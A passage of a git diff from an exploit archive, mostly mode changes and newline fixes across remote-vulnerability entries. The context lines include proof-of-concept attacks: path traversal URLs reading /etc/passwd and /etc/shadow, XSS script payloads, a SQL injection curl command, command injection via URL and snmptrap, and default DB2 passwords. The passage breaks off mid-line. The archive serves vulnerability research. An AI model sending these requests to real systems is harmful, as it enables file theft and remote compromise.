Microsoft Internet Information Server to transmit full source code of the file back to a remote user. Files located on the local drive where IIS is installed is not affected by this vulnerability. -http://target/file.asp\ \ No newline at end of file +http://target/file.asp\ \ No newline at end of file diff --git a/platforms/multiple/remote/19828.txt b/platforms/multiple/remote/19828.txt old mode 100755 new mode 100644 index dcf6d4949..5a8d9bda8 --- a/platforms/multiple/remote/19828.txt +++ b/platforms/multiple/remote/19828.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1083/info The default configuration of Cobalt Raq2 and Raq3 servers allows remote access to .htaccess files. This could lead to unauthorized retrieval of username and password information for restricted portions of a website hosted on the server. Make a regular GET request, specifying an .htaccess file ie: -http ://target/path/.htaccess \ No newline at end of file +http ://target/path/.htaccess \ No newline at end of file diff --git a/platforms/multiple/remote/19886.c b/platforms/multiple/remote/19886.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19887.c b/platforms/multiple/remote/19887.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19888.c b/platforms/multiple/remote/19888.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19903.txt b/platforms/multiple/remote/19903.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19906.txt b/platforms/multiple/remote/19906.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19916.c b/platforms/multiple/remote/19916.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19917.c b/platforms/multiple/remote/19917.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19918.c b/platforms/multiple/remote/19918.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19945.txt b/platforms/multiple/remote/19945.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1997.php b/platforms/multiple/remote/1997.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20027.txt b/platforms/multiple/remote/20027.txt old mode 100755 new mode 100644 index a61a41832..86f097868 --- a/platforms/multiple/remote/20027.txt +++ b/platforms/multiple/remote/20027.txt @@ -4,4 +4,4 @@ Within WebLogic Server and WebLogic Express there are four main java servlets re If an http request is made that includes "/file/", the server calls upon the default servlet which will cause the page to display the source code in the web browser. -http://target/file/filename \ No newline at end of file +http://target/file/filename \ No newline at end of file diff --git a/platforms/multiple/remote/20091.txt b/platforms/multiple/remote/20091.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20095.txt b/platforms/multiple/remote/20095.txt old mode 100755 new mode 100644 index f5491c781..1f728df67 --- a/platforms/multiple/remote/20095.txt +++ b/platforms/multiple/remote/20095.txt @@ -133,4 +133,4 @@ User: noaccess, home = / User: nobody4, home = / -User: mc, home = /space/u/mc \ No newline at end of file +User: mc, home = /space/u/mc \ No newline at end of file diff --git a/platforms/multiple/remote/20097.txt b/platforms/multiple/remote/20097.txt old mode 100755 new mode 100644 index 926c33714..7dde49364 --- a/platforms/multiple/remote/20097.txt +++ b/platforms/multiple/remote/20097.txt @@ -13,4 +13,4 @@ then accessing http://site.running.websphere/servlet/file/login.jsp -would cause the unparsed contents of the file to show up in the web browser." \ No newline at end of file +would cause the unparsed contents of the file to show up in the web browser." \ No newline at end of file diff --git a/platforms/multiple/remote/201.c b/platforms/multiple/remote/201.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20104.txt b/platforms/multiple/remote/20104.txt old mode 100755 new mode 100644 index 220a615af..f278420de --- a/platforms/multiple/remote/20104.txt +++ b/platforms/multiple/remote/20104.txt @@ -7,4 +7,4 @@ http://www.server.com/%00 Will return the contents of the server's document root directory. -Versions of Roxen WebServer 2.0 prior to 2.0.69 are affected. \ No newline at end of file +Versions of Roxen WebServer 2.0 prior to 2.0.69 are affected. \ No newline at end of file diff --git a/platforms/multiple/remote/20131.txt b/platforms/multiple/remote/20131.txt old mode 100755 new mode 100644 index 0843a133c..521ea2669 --- a/platforms/multiple/remote/20131.txt +++ b/platforms/multiple/remote/20131.txt @@ -7,4 +7,4 @@ http://narco.guerrilla.sucks.co:8080/anything.jsp Error: 404 Location: /anything.jsp -JSP file "/appsrv2/jakarta-tomcat/webapps/ROOT/anything.jsp" not found \ No newline at end of file +JSP file "/appsrv2/jakarta-tomcat/webapps/ROOT/anything.jsp" not found \ No newline at end of file diff --git a/platforms/multiple/remote/20132.txt b/platforms/multiple/remote/20132.txt old mode 100755 new mode 100644 index 03242e116..9ea2b3e5d --- a/platforms/multiple/remote/20132.txt +++ b/platforms/multiple/remote/20132.txt @@ -67,4 +67,4 @@ Session Last Accessed Time: 964047528749 Session Max Inactive Interval Seconds: 1800 Session values: -numguess = num.NumberGuessBean@6bfa9a1 \ No newline at end of file +numguess = num.NumberGuessBean@6bfa9a1 \ No newline at end of file diff --git a/platforms/multiple/remote/20139.txt b/platforms/multiple/remote/20139.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20140.txt b/platforms/multiple/remote/20140.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20181.txt b/platforms/multiple/remote/20181.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20206.txt b/platforms/multiple/remote/20206.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20207.txt b/platforms/multiple/remote/20207.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20234.txt b/platforms/multiple/remote/20234.txt old mode 100755 new mode 100644 index fca52fc45..27a21551c --- a/platforms/multiple/remote/20234.txt +++ b/platforms/multiple/remote/20234.txt @@ -4,4 +4,4 @@ A remote user is capable of gaining read access to any file residing in the same For example: -http://target:8002/Newuser?Image=../../database/rbsserv.mdb \ No newline at end of file +http://target:8002/Newuser?Image=../../database/rbsserv.mdb \ No newline at end of file diff --git a/platforms/multiple/remote/20258.c b/platforms/multiple/remote/20258.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20259.txt b/platforms/multiple/remote/20259.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20313.txt b/platforms/multiple/remote/20313.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20314.txt b/platforms/multiple/remote/20314.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20315.txt b/platforms/multiple/remote/20315.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20322.html b/platforms/multiple/remote/20322.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20406.txt b/platforms/multiple/remote/20406.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20425.pl b/platforms/multiple/remote/20425.pl index a254ecdd5..5326daa7e 100755 --- a/platforms/multiple/remote/20425.pl +++ b/platforms/multiple/remote/20425.pl @@ -62,4 +62,4 @@ if($showline eq 1){ chomp($line); $registerinfo.=$line; } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/multiple/remote/20441.txt b/platforms/multiple/remote/20441.txt old mode 100755 new mode 100644 index 3f9fb45e6..28a2ef75f --- a/platforms/multiple/remote/20441.txt +++ b/platforms/multiple/remote/20441.txt @@ -8,4 +8,4 @@ Successful exploitation of this vulnerability could assist in further attacks ag http://target/cgi-bin/db2www/library/document.d2w/show -DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w. \ No newline at end of file +DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w. \ No newline at end of file diff --git a/platforms/multiple/remote/20450.txt b/platforms/multiple/remote/20450.txt old mode 100755 new mode 100644 index aa5ecc6ca..de50b56d5 --- a/platforms/multiple/remote/20450.txt +++ b/platforms/multiple/remote/20450.txt @@ -8,4 +8,4 @@ Successful exploitation will lead to the attacker gaining unauthorized access to Depending on the database and system type, this may lead to a compromise of interactive access on the host running Webmail and the database. -http://target/includes/global.inc \ No newline at end of file +http://target/includes/global.inc \ No newline at end of file diff --git a/platforms/multiple/remote/20466.txt b/platforms/multiple/remote/20466.txt old mode 100755 new mode 100644 index 80780db82..d4eaf9a1f --- a/platforms/multiple/remote/20466.txt +++ b/platforms/multiple/remote/20466.txt @@ -6,4 +6,4 @@ By requesting a specially crafted URL by way of php, it is possible for a remote Successful exploitation of this vulnerability could lead to the disclosure of sensitive information and possibly assist in further attacks against the victim. -http://target/index.php3.%5c../..%5cconf/httpd.conf \ No newline at end of file +http://target/index.php3.%5c../..%5cconf/httpd.conf \ No newline at end of file diff --git a/platforms/multiple/remote/20467.txt b/platforms/multiple/remote/20467.txt old mode 100755 new mode 100644 index de611eb98..09d551599 --- a/platforms/multiple/remote/20467.txt +++ b/platforms/multiple/remote/20467.txt @@ -9,4 +9,4 @@ http://target:8765/somefile.html/ will return the source to 'somefile.html'. -As a result, it is possible for an attacker to obtain source code to any Ultraseek scripts, which could be used to support further attacks. \ No newline at end of file +As a result, it is possible for an attacker to obtain source code to any Ultraseek scripts, which could be used to support further attacks. \ No newline at end of file diff --git a/platforms/multiple/remote/20468.txt b/platforms/multiple/remote/20468.txt old mode 100755 new mode 100644 index 3727d54bf..94146d4d2 --- a/platforms/multiple/remote/20468.txt +++ b/platforms/multiple/remote/20468.txt @@ -10,4 +10,4 @@ will, if the file 'example' does not exist, return an error message which disclo As a result, it is possible for an attacker to obtain information about the server's configuration and directory structure, which could be used to support further attacks. -This may be the result of a weak default configuration. Ultraseek Server returns detailed error information when requests are recieved from an administrative IP address. By default, administrative status is given to all addresses. \ No newline at end of file +This may be the result of a weak default configuration. Ultraseek Server returns detailed error information when requests are recieved from an administrative IP address. By default, administrative status is given to all addresses. \ No newline at end of file diff --git a/platforms/multiple/remote/20472.txt b/platforms/multiple/remote/20472.txt old mode 100755 new mode 100644 index bae46bee6..4857cf382 --- a/platforms/multiple/remote/20472.txt +++ b/platforms/multiple/remote/20472.txt @@ -10,4 +10,4 @@ Password: db2admin DB2 Universal Database for Linux Username: db2inst1, db2as, db2fenc1 -Password: ibmdb2 \ No newline at end of file +Password: ibmdb2 \ No newline at end of file diff --git a/platforms/multiple/remote/20491.txt b/platforms/multiple/remote/20491.txt old mode 100755 new mode 100644 index 703f0a717..08e3c47ea --- a/platforms/multiple/remote/20491.txt +++ b/platforms/multiple/remote/20491.txt @@ -10,4 +10,4 @@ This attack allows malicious users in control of a fake Kerberos server to explo telnet> environ define krb4_proxy http://your.host:80 telnet> environ export krb4_proxy -telnet> open localhost \ No newline at end of file +telnet> open localhost \ No newline at end of file diff --git a/platforms/multiple/remote/20507.txt b/platforms/multiple/remote/20507.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20513.txt b/platforms/multiple/remote/20513.txt old mode 100755 new mode 100644 index 379b5ab41..a9c6e7605 --- a/platforms/multiple/remote/20513.txt +++ b/platforms/multiple/remote/20513.txt @@ -8,4 +8,4 @@ http://target/carbo.dll?icatcommand=..\..\directory/filename.ext&catalogname=cat Successful exploitation of this vulnerability may disclose sensitive information such as usernames and passwords and aid in the development of further attacks. -http://target/carbo.dll?icatcommand=..\..\directory/filename.ext&catalogname=catalog \ No newline at end of file +http://target/carbo.dll?icatcommand=..\..\directory/filename.ext&catalogname=catalog \ No newline at end of file diff --git a/platforms/multiple/remote/20516.txt b/platforms/multiple/remote/20516.txt old mode 100755 new mode 100644 index 7d0abce4f..8a5a15381 --- a/platforms/multiple/remote/20516.txt +++ b/platforms/multiple/remote/20516.txt @@ -5,4 +5,4 @@ BEA Systems WebLogic Server is an enterprise level web and wireless application Unchecked buffers exist in a particular handler for URL requests that begin with two dots "..". Depending on the data entered into the buffer, WebLogic Server could be forced to crash or arbitrary code could be executed on the system in the security context of the web server. In the event that random data was sent in order to crash the server, restarting the application would be required in order to regain normal functionality. -..<overly long string of characters> \ No newline at end of file +..<overly long string of characters> \ No newline at end of file diff --git a/platforms/multiple/remote/20519.c b/platforms/multiple/remote/20519.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20529.pl b/platforms/multiple/remote/20529.pl index e8765cbdc..a4006632a 100755 --- a/platforms/multiple/remote/20529.pl +++ b/platforms/multiple/remote/20529.pl @@ -83,4 +83,4 @@ sub sendraw { select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } -# ---------------------- \ No newline at end of file +# ---------------------- \ No newline at end of file diff --git a/platforms/multiple/remote/2053.rb b/platforms/multiple/remote/2053.rb index 339fb0f9a..56d629ddd 100755 --- a/platforms/multiple/remote/2053.rb +++ b/platforms/multiple/remote/2053.rb @@ -84,5 +84,4 @@ system(cmd) sock.close -# milw0rm.com [2006-07-21] - \ No newline at end of file +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/platforms/multiple/remote/20537.txt b/platforms/multiple/remote/20537.txt old mode 100755 new mode 100644 index 4610f5d30..2dd6cdeb3 --- a/platforms/multiple/remote/20537.txt +++ b/platforms/multiple/remote/20537.txt @@ -8,4 +8,4 @@ Successful exploitation of this vulnerability will lead to complete compromise o #define LOCKSMITH_USER "politically" -#define LOCKSMITH_PASSWORD "correct" \ No newline at end of file +#define LOCKSMITH_PASSWORD "correct" \ No newline at end of file diff --git a/platforms/multiple/remote/20591.txt b/platforms/multiple/remote/20591.txt old mode 100755 new mode 100644 index 6260e3f8e..51a976008 --- a/platforms/multiple/remote/20591.txt +++ b/platforms/multiple/remote/20591.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2285/info Netscape Enterprise Server with Web Publishing enabled will disclose the directory listing of the server to unauthenticated users who submit an INDEX request. -INDEX / HTTP/1.0 \ No newline at end of file +INDEX / HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/20595.txt b/platforms/multiple/remote/20595.txt old mode 100755 new mode 100644 index cc6459e56..f04d2d2be --- a/platforms/multiple/remote/20595.txt +++ b/platforms/multiple/remote/20595.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/2300/info NSCA httpd prior to and including 1.5 and Apache Web Server prior to 1.0 contain a bug in the ScriptAlias function that allows remote users to view the source of CGI programs on the web server, if a ScriptAlias directory is defined under DocumentRoot. A full listing of the CGI-BIN directory can be obtained if indexing is turned on, as well. This is accomplished by adding multiple forward slashes in the URL (see exploit). The web server fails to recognize that a ScriptAlias directory is actually redirected to a CGI directory when this syntax is used, and returns the text of the script instead of properly executing it. This may allow an attacker to audit scripts for vulnerabilities, retrieve proprietary information, etc. To retrieve the contents of http://targethost/cgi-bin/script.cgi an attacker would use the following URL, provided the directory cgi-bin is redirected using ScriptAlias: -http://targethost///cgi-bin/script.cgi \ No newline at end of file +http://targethost///cgi-bin/script.cgi \ No newline at end of file diff --git a/platforms/multiple/remote/20601.txt b/platforms/multiple/remote/20601.txt old mode 100755 new mode 100644 index 1f63cea71..aa13d3152 --- a/platforms/multiple/remote/20601.txt +++ b/platforms/multiple/remote/20601.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2314/info A specially crafted URL, composed of '../' and '%00', will disclose the directory listing and files of the target with read permissions. -http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00 \ No newline at end of file +http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/multiple/remote/2061.txt b/platforms/multiple/remote/2061.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20618.txt b/platforms/multiple/remote/20618.txt old mode 100755 new mode 100644 index 76a04f182..abc165cd8 --- a/platforms/multiple/remote/20618.txt +++ b/platforms/multiple/remote/20618.txt @@ -17,4 +17,4 @@ http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+u "orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages. -It may also be possible to query other databases. \ No newline at end of file +It may also be possible to query other databases. \ No newline at end of file diff --git a/platforms/multiple/remote/20625.txt b/platforms/multiple/remote/20625.txt old mode 100755 new mode 100644 index 05a694849..8bb10d510 --- a/platforms/multiple/remote/20625.txt +++ b/platforms/multiple/remote/20625.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2362/info A remote user could gain read access to known files outside of the root directory where SilverPlatter WebSPIRS resides. Requesting a specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. -www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../path/to/file \ No newline at end of file +www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../path/to/file \ No newline at end of file diff --git a/platforms/multiple/remote/20635.txt b/platforms/multiple/remote/20635.txt old mode 100755 new mode 100644 index 545a64a9f..4db978dad --- a/platforms/multiple/remote/20635.txt +++ b/platforms/multiple/remote/20635.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2384/info It is possible for a remote user to gain read access to directories and files outside the root directory of a machine running Resin. Requesting a specially crafted URL composed of '/..' or '/...' sequences will disclose an arbitrary directory. -http://target/\../readme.txt \ No newline at end of file +http://target/\../readme.txt \ No newline at end of file diff --git a/platforms/multiple/remote/20638.txt b/platforms/multiple/remote/20638.txt old mode 100755 new mode 100644 index 8a989ce29..70d21630e --- a/platforms/multiple/remote/20638.txt +++ b/platforms/multiple/remote/20638.txt @@ -12,4 +12,4 @@ http://target/upload.html Execute it via: -http://target/cgi/bin//...//upload/[file name] \ No newline at end of file +http://target/cgi/bin//...//upload/[file name] \ No newline at end of file diff --git a/platforms/multiple/remote/20639.txt b/platforms/multiple/remote/20639.txt old mode 100755 new mode 100644 index 6549949cb..2067d125f --- a/platforms/multiple/remote/20639.txt +++ b/platforms/multiple/remote/20639.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2389/info Requesting a specailly crafted URL containg arbitrary code, can be exected on a Unix system running Bajie Webserver. Any arbitrary commands appended to a malicious URL after the ';' will be executed as an independent job. -http://target/bin/test.txt;%20[shell command] \ No newline at end of file +http://target/bin/test.txt;%20[shell command] \ No newline at end of file diff --git a/platforms/multiple/remote/20685.txt b/platforms/multiple/remote/20685.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20693.c b/platforms/multiple/remote/20693.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20719.txt b/platforms/multiple/remote/20719.txt old mode 100755 new mode 100644 index 4987160c0..f35ebbe72 --- a/platforms/multiple/remote/20719.txt +++ b/platforms/multiple/remote/20719.txt @@ -19,4 +19,4 @@ http://www.example.com/examples/jsp/num/numguess.js%70 The following variant URL for Tomcat has been provided by lovehacker <lovehacker@263.net>: -http://www.example.com/examples/snp/snoop%252ejsp \ No newline at end of file +http://www.example.com/examples/snp/snoop%252ejsp \ No newline at end of file diff --git a/platforms/multiple/remote/20722.txt b/platforms/multiple/remote/20722.txt old mode 100755 new mode 100644 index 273e903d5..06e9a0ac0 --- a/platforms/multiple/remote/20722.txt +++ b/platforms/multiple/remote/20722.txt @@ -6,4 +6,4 @@ On Resin webservers, JavaBean files reside in a protected directory, '/WEB-INF/c An attacker exploiting this may be able to gain sensitive information contained in the JavaBeans. -http://target/.jsp/WEB-INF/classes/filename \ No newline at end of file +http://target/.jsp/WEB-INF/classes/filename \ No newline at end of file diff --git a/platforms/multiple/remote/20738.txt b/platforms/multiple/remote/20738.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20797.txt b/platforms/multiple/remote/20797.txt old mode 100755 new mode 100644 index 35ed73ab4..bfb734f57 --- a/platforms/multiple/remote/20797.txt +++ b/platforms/multiple/remote/20797.txt @@ -8,4 +8,4 @@ o retrieve /etc/password from a vulnerable host, request: http://www.server.com/../../../../etc/passwd -The number of ../ path characters will depend on the ServerRoot (location of the virtual / directory) setting. \ No newline at end of file +The number of ../ path characters will depend on the ServerRoot (location of the virtual / directory) setting. \ No newline at end of file diff --git a/platforms/multiple/remote/20807.txt b/platforms/multiple/remote/20807.txt old mode 100755 new mode 100644 index 439116f87..52d39cb22 --- a/platforms/multiple/remote/20807.txt +++ b/platforms/multiple/remote/20807.txt @@ -4,4 +4,4 @@ DataWizard WebXQ server could be led to traverse directories and possibly reveal By including '/../' sequences along with a known file or directory in requested URLs, a remote user can obtain read access to the requested directories and files outside the web root, potentially compromising the privacy of user data and/or obtaining information which could be used to further compromise the host. -http://www.example.com/./.../[target file] \ No newline at end of file +http://www.example.com/./.../[target file] \ No newline at end of file diff --git a/platforms/multiple/remote/2082.html b/platforms/multiple/remote/2082.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20869.html b/platforms/multiple/remote/20869.html old mode 100755 new mode 100644 index 2bb57d14b..472826bf5 --- a/platforms/multiple/remote/20869.html +++ b/platforms/multiple/remote/20869.html @@ -43,4 +43,4 @@ and we will be left with the following HTML code: <SCRIPT language="javascript"> alert("hi"); </SCRIPT> -</BODY></HTML> \ No newline at end of file +</BODY></HTML> \ No newline at end of file diff --git a/platforms/multiple/remote/20881.txt b/platforms/multiple/remote/20881.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20882.txt b/platforms/multiple/remote/20882.txt old mode 100755 new mode 100644 index 8edaba0a7..8ef916318 --- a/platforms/multiple/remote/20882.txt +++ b/platforms/multiple/remote/20882.txt @@ -6,4 +6,4 @@ Versions of Freestyle Chat are vulnerable to directory traversal attacks. This c Properly exploited, this could provide information useful in further attacks on the vulnerable host. -http://www.example.com/.../.../scandisk.log \ No newline at end of file +http://www.example.com/.../.../scandisk.log \ No newline at end of file diff --git a/platforms/multiple/remote/20889.txt b/platforms/multiple/remote/20889.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20890.txt b/platforms/multiple/remote/20890.txt old mode 100755 new mode 100644 index 297adce30..9947dc602 --- a/platforms/multiple/remote/20890.txt +++ b/platforms/multiple/remote/20890.txt @@ -16,4 +16,4 @@ test.');a.Close();">Click here</A> HREF is not the only tag ignored. Any tag capable of containing scripting command will not be filtered by eSafe. For example: -<BODY onload="alert('hi');"> \ No newline at end of file +<BODY onload="alert('hi');"> \ No newline at end of file diff --git a/platforms/multiple/remote/20891.txt b/platforms/multiple/remote/20891.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/20894.txt b/platforms/multiple/remote/20894.txt old mode 100755 new mode 100644 index b73e7c72f..a8e5b13a0 --- a/platforms/multiple/remote/20894.txt +++ b/platforms/multiple/remote/20894.txt @@ -7,4 +7,4 @@ Acme.Serve 1.7 comes with a webserver that listens on port 9090. This webserver If an attacker were to connect, they could view possibly sensitive information. -http://potentialvictim:9090//etc/shadow to view '/etc/shadow'. \ No newline at end of file +http://potentialvictim:9090//etc/shadow to view '/etc/shadow'. \ No newline at end of file diff --git a/platforms/multiple/remote/20909.txt b/platforms/multiple/remote/20909.txt old mode 100755 new mode 100644 index da3f5d7ed..b043e0d37 --- a/platforms/multiple/remote/20909.txt +++ b/platforms/multiple/remote/20909.txt @@ -4,4 +4,4 @@ ovactiond is part of the system management software packages OpenView and Netvie A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized. -snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s "" \ No newline at end of file +snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s "" \ No newline at end of file diff --git a/platforms/multiple/remote/20972.txt b/platforms/multiple/remote/20972.txt old mode 100755 new mode 100644 index 45ba76f10..2e02f1164 --- a/platforms/multiple/remote/20972.txt +++ b/platforms/multiple/remote/20972.txt @@ -12,4 +12,4 @@ Then write the following in your browser: http://localhost:8000/file/../test1.mp3 - Will fail in getting the file -http://localhost:8000/file/%2E%2E/test1.mp3 - Will succeed in getting the file \ No newline at end of file +http://localhost:8000/file/%2E%2E/test1.mp3 - Will succeed in getting the file \ No newline at end of file diff --git a/platforms/multiple/remote/21002.txt b/platforms/multiple/remote/21002.txt old mode 100755 new mode 100644 index 888c73d1d..e5158903c --- a/platforms/multiple/remote/21002.txt +++ b/platforms/multiple/remote/21002.txt @@ -5,4 +5,4 @@ A possible vulnerability exists in Apache that could cause directory contents to The problem is likely the result of an error in "multiview" functionality provided as part of Apache's content negotiation support. Exploitation of this problem may lead to the dislosure of sensitive information to attackers. http://target-webserver/?M=A -http://target-webserver/?S=D \ No newline at end of file +http://target-webserver/?S=D \ No newline at end of file diff --git a/platforms/multiple/remote/21025.txt b/platforms/multiple/remote/21025.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21026.txt b/platforms/multiple/remote/21026.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21027.txt b/platforms/multiple/remote/21027.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21067.c b/platforms/multiple/remote/21067.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21145.nasl b/platforms/multiple/remote/21145.nasl old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21160.txt b/platforms/multiple/remote/21160.txt old mode 100755 new mode 100644 index 0efb1d180..2589cfdcf --- a/platforms/multiple/remote/21160.txt +++ b/platforms/multiple/remote/21160.txt @@ -8,4 +8,4 @@ This issue is known to occur when large object caching is enabled, which sets ca As a result, sensitive information disclosed in arbitrary web-readable files may be used by the remote attacker to make more concentrated attacks in an attempt to further compromise the host. -http://site.com/ifx/?LO=../../../file \ No newline at end of file +http://site.com/ifx/?LO=../../../file \ No newline at end of file diff --git a/platforms/multiple/remote/21193.txt b/platforms/multiple/remote/21193.txt old mode 100755 new mode 100644 index b0d31b6f5..f1817dce8 --- a/platforms/multiple/remote/21193.txt +++ b/platforms/multiple/remote/21193.txt @@ -6,4 +6,4 @@ DeleGate is prone to cross-site scripting attacks. HTML tags are not filtered fr Such an attack may be used to steal a legitimate user's cookie-based authentication credentials. -http://IP_Address_of_DeleGate/<script>alert("aaa");</script> \ No newline at end of file +http://IP_Address_of_DeleGate/<script>alert("aaa");</script> \ No newline at end of file diff --git a/platforms/multiple/remote/21197.txt b/platforms/multiple/remote/21197.txt old mode 100755 new mode 100644 index 448262a88..23092b7a5 --- a/platforms/multiple/remote/21197.txt +++ b/platforms/multiple/remote/21197.txt @@ -6,4 +6,4 @@ The default installation allows users to self-register, potentially allowing unt This may provide a window of opportunity for an untrusted, malicious user to access the service to exploit known issues. One example of an existing issue that may be exploited as a result of untrusted users being able to self-register is BugTraq ID 3776 "BSCW Remote Command Execution Vulnerability". -http://your.bscwserver.url/pub/english.cgi?op=rmail \ No newline at end of file +http://your.bscwserver.url/pub/english.cgi?op=rmail \ No newline at end of file diff --git a/platforms/multiple/remote/21212.txt b/platforms/multiple/remote/21212.txt old mode 100755 new mode 100644 index 6231c1a5f..32b05b681 --- a/platforms/multiple/remote/21212.txt +++ b/platforms/multiple/remote/21212.txt @@ -22,4 +22,4 @@ Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234 acbe &sid=3c234acbec234acbe&ord=1" was not found on this server.<P></BODY>Connection -closed by foreign host. \ No newline at end of file +closed by foreign host. \ No newline at end of file diff --git a/platforms/multiple/remote/21276.txt b/platforms/multiple/remote/21276.txt old mode 100755 new mode 100644 index dc5d020c3..06819c8c7 --- a/platforms/multiple/remote/21276.txt +++ b/platforms/multiple/remote/21276.txt @@ -6,4 +6,4 @@ If the attacker submits an HTTP request for an invalid path, the server will ret Versions prior to TEXIS 4.03.1049406926 20030403 are vulnerable. -http://www.example.com/texis/nonexistent/path/ \ No newline at end of file +http://www.example.com/texis/nonexistent/path/ \ No newline at end of file diff --git a/platforms/multiple/remote/21295.txt b/platforms/multiple/remote/21295.txt old mode 100755 new mode 100644 index 7e92028c5..3a6e2706d --- a/platforms/multiple/remote/21295.txt +++ b/platforms/multiple/remote/21295.txt @@ -8,4 +8,4 @@ It should be noted that this may allow an attacker to circumvent .htaccess files This issue may be the result of a configuration error. -http://site/servlets/gnujsp/[dirname]/[file] \ No newline at end of file +http://site/servlets/gnujsp/[dirname]/[file] \ No newline at end of file diff --git a/platforms/multiple/remote/21339.c b/platforms/multiple/remote/21339.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21384.txt b/platforms/multiple/remote/21384.txt old mode 100755 new mode 100644 index 2aec74118..db71392f2 --- a/platforms/multiple/remote/21384.txt +++ b/platforms/multiple/remote/21384.txt @@ -4,4 +4,4 @@ Demarc PureSecure is a commercially available graphical front-end for Snort, in A vulnerability has been reported in some versions of PureSecure. User supplied input is used to construct a SQL statement, allowing SQL injection attacks. Administrative access may be gained through exploitation of this flaw. -curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc \ No newline at end of file +curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc \ No newline at end of file diff --git a/platforms/multiple/remote/21444.txt b/platforms/multiple/remote/21444.txt old mode 100755 new mode 100644 index 85936ef11..82182e464 --- a/platforms/multiple/remote/21444.txt +++ b/platforms/multiple/remote/21444.txt @@ -7,4 +7,4 @@ HTML code is not filtered from URL parameters that are used as output in the web Successful exploitation may allow the attacker to steal cookie-based authentication credentials from the administrative user. http://ip:1500/DSASD&DSA=1&LOCID=<script>^Ã?.</script>&FRAME=Y -http://ip:1500/OBCR&OC=<script>^Ã?.</script>&FRAME=Y \ No newline at end of file +http://ip:1500/OBCR&OC=<script>^Ã?.</script>&FRAME=Y \ No newline at end of file diff --git a/platforms/multiple/remote/21445.txt b/platforms/multiple/remote/21445.txt old mode 100755 new mode 